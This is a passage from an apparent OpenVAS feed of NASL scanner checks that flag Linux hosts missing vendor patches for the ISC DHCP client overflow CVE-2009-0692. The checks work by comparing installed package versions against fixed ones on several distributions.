script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"dhcp3-client\", ver:\"3.0.3-6ubuntu7.1\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"dhcp3-common\", ver:\"3.0.3-6ubuntu7.1\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"dhcp3-dev\", ver:\"3.0.3-6ubuntu7.1\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"dhcp3-server\", ver:\"3.0.3-6ubuntu7.1\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"dhcp3-relay\", ver:\"3.0.3-6ubuntu7.1\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"dhcp3-client\", ver:\"3.0.6.dfsg-1ubuntu9.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"dhcp3-common\", ver:\"3.0.6.dfsg-1ubuntu9.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"dhcp3-dev\", ver:\"3.0.6.dfsg-1ubuntu9.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"dhcp3-server\", ver:\"3.0.6.dfsg-1ubuntu9.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"dhcp3-relay\", ver:\"3.0.6.dfsg-1ubuntu9.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"dhcp3-client\", ver:\"3.1.1-1ubuntu2.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"dhcp3-common\", ver:\"3.1.1-1ubuntu2.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"dhcp3-dev\", ver:\"3.1.1-1ubuntu2.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"dhcp3-server\", ver:\"3.1.1-1ubuntu2.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"dhcp3-relay\", ver:\"3.1.1-1ubuntu2.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"dhcp3-server-ldap\", ver:\"3.1.1-1ubuntu2.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"dhcp-client\", ver:\"3.1.1-5ubuntu8.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"dhcp3-client\", ver:\"3.1.1-5ubuntu8.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"dhcp3-common\", ver:\"3.1.1-5ubuntu8.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"dhcp3-dev\", ver:\"3.1.1-5ubuntu8.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"dhcp3-server\", ver:\"3.1.1-5ubuntu8.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"dhcp3-relay\", ver:\"3.1.1-5ubuntu8.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"dhcp3-server-ldap\", ver:\"3.1.1-5ubuntu8.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-27T10:56:43", "description": "The remote host is missing updates announced in\nadvisory RHSA-2009:1136.\n\nThe Dynamic Host Configuration Protocol (DHCP) is a protocol that allows\nindividual devices on an IP network to get their own network configuration\ninformation, including an IP address, a subnet mask, and a broadcast\naddress.\n\nThe Mandriva Linux Engineering Team discovered a stack-based buffer\noverflow flaw in the ISC DHCP client. If the DHCP client were to receive a\nmalicious DHCP response, it could crash or execute arbitrary code with the\npermissions of the client (root). (CVE-2009-0692)\n\nUsers of DHCP should upgrade to these updated packages, which contain a\nbackported patch to correct this issue.", "cvss3": {}, "published": "2009-07-29T00:00:00", "type": "openvas", "title": "RedHat Security Advisory RHSA-2009:1136", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-0692"], "modified": "2017-07-12T00:00:00", "id": "OPENVAS:64386", "href": "http://plugins.openvas.org/nasl.php?oid=64386", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: RHSA_2009_1136.nasl 6683 2017-07-12 09:41:57Z cfischer $\n# Description: Auto-generated from advisory RHSA-2009:1136 ()\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates announced in\nadvisory RHSA-2009:1136.\n\nThe Dynamic Host Configuration Protocol (DHCP) is a protocol that allows\nindividual devices on an IP network to get their own network configuration\ninformation, including an IP address, a subnet mask, and a broadcast\naddress.\n\nThe Mandriva Linux Engineering Team discovered a stack-based buffer\noverflow flaw in the ISC DHCP client. If the DHCP client were to receive a\nmalicious DHCP response, it could crash or execute arbitrary code with the\npermissions of the client (root). (CVE-2009-0692)\n\nUsers of DHCP should upgrade to these updated packages, which contain a\nbackported patch to correct this issue.\";\n\ntag_solution = \"Please note that this update is available via\nRed Hat Network. To use Red Hat Network, launch the Red\nHat Update Agent with the following command: up2date\";\n\n\n\nif(description)\n{\n script_id(64386);\n script_version(\"$Revision: 6683 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-12 11:41:57 +0200 (Wed, 12 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-07-29 19:28:37 +0200 (Wed, 29 Jul 2009)\");\n script_cve_id(\"CVE-2009-0692\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"RedHat Security Advisory RHSA-2009:1136\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"http://rhn.redhat.com/errata/RHSA-2009-1136.html\");\n script_xref(name : \"URL\" , value : \"http://www.redhat.com/security/updates/classification/#critical\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"dhclient\", rpm:\"dhclient~3.0.1~65.el4_8.1\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp\", rpm:\"dhcp~3.0.1~65.el4_8.1\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-debuginfo\", rpm:\"dhcp-debuginfo~3.0.1~65.el4_8.1\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-devel\", rpm:\"dhcp-devel~3.0.1~65.el4_8.1\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhclient\", rpm:\"dhclient~3.0.1~62.el4_7.1\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp\", rpm:\"dhcp~3.0.1~62.el4_7.1\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-debuginfo\", rpm:\"dhcp-debuginfo~3.0.1~62.el4_7.1\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-devel\", rpm:\"dhcp-devel~3.0.1~62.el4_7.1\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:38:41", "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n dhcp\n dhcp-client\n dhcp-devel\n dhcp-relay\n dhcp-server\n\n\nMore details may also be found by searching for the SuSE\nEnterprise Server 10 patch database located at\nhttp://download.novell.com/patch/finder/", "cvss3": {}, "published": "2009-10-13T00:00:00", "type": "openvas", "title": "SLES10: Security update for dhclient", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-0692"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:136141256231065772", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231065772", "sourceData": "#\n#VID slesp2-dhcp-6335\n# OpenVAS Vulnerability Test\n# $\n# Description: Security update for dhclient\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n dhcp\n dhcp-client\n dhcp-devel\n dhcp-relay\n dhcp-server\n\n\nMore details may also be found by searching for the SuSE\nEnterprise Server 10 patch database located at\nhttp://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.65772\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-13 18:25:40 +0200 (Tue, 13 Oct 2009)\");\n script_cve_id(\"CVE-2009-0692\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"SLES10: Security update for dhclient\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"dhcp\", rpm:\"dhcp~3.0.3~23.55\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-client\", rpm:\"dhcp-client~3.0.3~23.55\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-devel\", rpm:\"dhcp-devel~3.0.3~23.55\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-relay\", rpm:\"dhcp-relay~3.0.3~23.55\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-server\", rpm:\"dhcp-server~3.0.3~23.55\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-19T15:04:59", "description": "Ubuntu Update for Linux kernel vulnerabilities USN-803-2", "cvss3": {}, "published": "2010-01-29T00:00:00", "type": "openvas", "title": "Ubuntu Update for dhcp3 vulnerability USN-803-2", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-0692"], "modified": "2018-01-18T00:00:00", "id": "OPENVAS:1361412562310840379", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310840379", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_803_2.nasl 8457 2018-01-18 07:58:32Z teissa $\n#\n# Ubuntu Update for dhcp3 vulnerability USN-803-2\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"USN-803-1 fixed a vulnerability in Dhcp. Due to an error, the patch to\n fix the vulnerability was not properly applied on Ubuntu 8.10 and higher.\n Even with the patch improperly applied, the default compiler options\n reduced the vulnerability to a denial of service. Additionally, in Ubuntu\n 9.04 and higher, users were also protected by the AppArmor dhclient3\n profile. This update fixes the problem.\n\n Original advisory details:\n \n It was discovered that the DHCP client as included in dhcp3 did not verify\n the length of certain option fields when processing a response from an IPv4\n dhcp server. If a user running Ubuntu 6.06 LTS or 8.04 LTS connected to a\n malicious dhcp server, a remote attacker could cause a denial of service or\n execute arbitrary code as the user invoking the program, typically the\n 'dhcp' user. For users running Ubuntu 8.10 or 9.04, a remote attacker\n should only be able to cause a denial of service in the DHCP client. In\n Ubuntu 9.04, attackers would also be isolated by the AppArmor dhclient3\n profile.\";\n\ntag_summary = \"Ubuntu Update for Linux kernel vulnerabilities USN-803-2\";\ntag_affected = \"dhcp3 vulnerability on Ubuntu 8.10 ,\n Ubuntu 9.04 ,\n Ubuntu 9.10\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-803-2/\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.840379\");\n script_version(\"$Revision: 8457 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-18 08:58:32 +0100 (Thu, 18 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-01-29 14:09:25 +0100 (Fri, 29 Jan 2010)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"USN\", value: \"803-2\");\n script_cve_id(\"CVE-2009-0692\");\n script_name(\"Ubuntu Update for dhcp3 vulnerability USN-803-2\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU9.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"dhcp3-client\", ver:\"3.1.2-1ubuntu7.1\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"dhcp3-common\", ver:\"3.1.2-1ubuntu7.1\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"dhcp3-dev\", ver:\"3.1.2-1ubuntu7.1\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"dhcp3-server\", ver:\"3.1.2-1ubuntu7.1\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"dhcp3-relay\", ver:\"3.1.2-1ubuntu7.1\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"dhcp3-server-ldap\", ver:\"3.1.2-1ubuntu7.1\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"dhcp-client\", ver:\"3.1.2-1ubuntu7.1\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU9.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"dhcp3-client\", ver:\"3.1.1-5ubuntu8.2\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"dhcp3-common\", ver:\"3.1.1-5ubuntu8.2\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"dhcp3-dev\", ver:\"3.1.1-5ubuntu8.2\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"dhcp3-server\", ver:\"3.1.1-5ubuntu8.2\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"dhcp3-relay\", ver:\"3.1.1-5ubuntu8.2\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"dhcp3-server-ldap\", ver:\"3.1.1-5ubuntu8.2\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"dhcp-client\", ver:\"3.1.1-5ubuntu8.2\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU8.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"dhcp3-client\", ver:\"3.1.1-1ubuntu2.2\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"dhcp3-common\", ver:\"3.1.1-1ubuntu2.2\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"dhcp3-dev\", ver:\"3.1.1-1ubuntu2.2\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"dhcp3-server\", ver:\"3.1.1-1ubuntu2.2\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"dhcp3-relay\", ver:\"3.1.1-1ubuntu2.2\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"dhcp3-server-ldap\", ver:\"3.1.1-1ubuntu2.2\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:56:33", "description": "The remote host is missing an update to dhcp\nannounced via advisory MDVSA-2009:151.", "cvss3": {}, "published": "2009-07-29T00:00:00", "type": "openvas", "title": "Mandrake Security Advisory MDVSA-2009:151 (dhcp)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-0692"], "modified": "2017-07-06T00:00:00", "id": "OPENVAS:64393", "href": "http://plugins.openvas.org/nasl.php?oid=64393", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: mdksa_2009_151.nasl 6573 2017-07-06 13:10:50Z cfischer $\n# Description: Auto-generated from advisory MDVSA-2009:151 (dhcp)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A vulnerability has been found and corrected in ISC DHCP:\n\nStack-based buffer overflow in the script_write_params method in\nclient/dhclient.c in ISC DHCP dhclient 4.1 before 4.1.0p1, 4.0\nbefore 4.0.1p1, 3.1 before 3.1.2p1, 3.0, and 2.0 allows remote DHCP\nservers to execute arbitrary code via a crafted subnet-mask option\n(CVE-2009-0692).\n\nThis update provides fixes for this vulnerability.\n\nAffected: 2008.1, 2009.0, 2009.1, Corporate 3.0, Corporate 4.0,\n Multi Network Firewall 2.0\";\ntag_solution = \"To upgrade automatically use MandrakeUpdate or urpmi. The verification\nof md5 checksums and GPG signatures is performed automatically for you.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=MDVSA-2009:151\";\ntag_summary = \"The remote host is missing an update to dhcp\nannounced via advisory MDVSA-2009:151.\";\n\n \n\nif(description)\n{\n script_id(64393);\n script_version(\"$Revision: 6573 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-06 15:10:50 +0200 (Thu, 06 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-07-29 19:28:37 +0200 (Wed, 29 Jul 2009)\");\n script_cve_id(\"CVE-2009-0692\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Mandrake Security Advisory MDVSA-2009:151 (dhcp)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"dhcp-client\", rpm:\"dhcp-client~3.0.6~5.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-common\", rpm:\"dhcp-common~3.0.6~5.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-devel\", rpm:\"dhcp-devel~3.0.6~5.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-doc\", rpm:\"dhcp-doc~3.0.6~5.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-relay\", rpm:\"dhcp-relay~3.0.6~5.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-server\", rpm:\"dhcp-server~3.0.6~5.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-client\", rpm:\"dhcp-client~3.0.7~1.3mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-common\", rpm:\"dhcp-common~3.0.7~1.3mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-devel\", rpm:\"dhcp-devel~3.0.7~1.3mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-doc\", rpm:\"dhcp-doc~3.0.7~1.3mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-relay\", rpm:\"dhcp-relay~3.0.7~1.3mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-server\", rpm:\"dhcp-server~3.0.7~1.3mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-client\", rpm:\"dhcp-client~4.1.0~5.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-common\", rpm:\"dhcp-common~4.1.0~5.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-devel\", rpm:\"dhcp-devel~4.1.0~5.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-doc\", rpm:\"dhcp-doc~4.1.0~5.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = 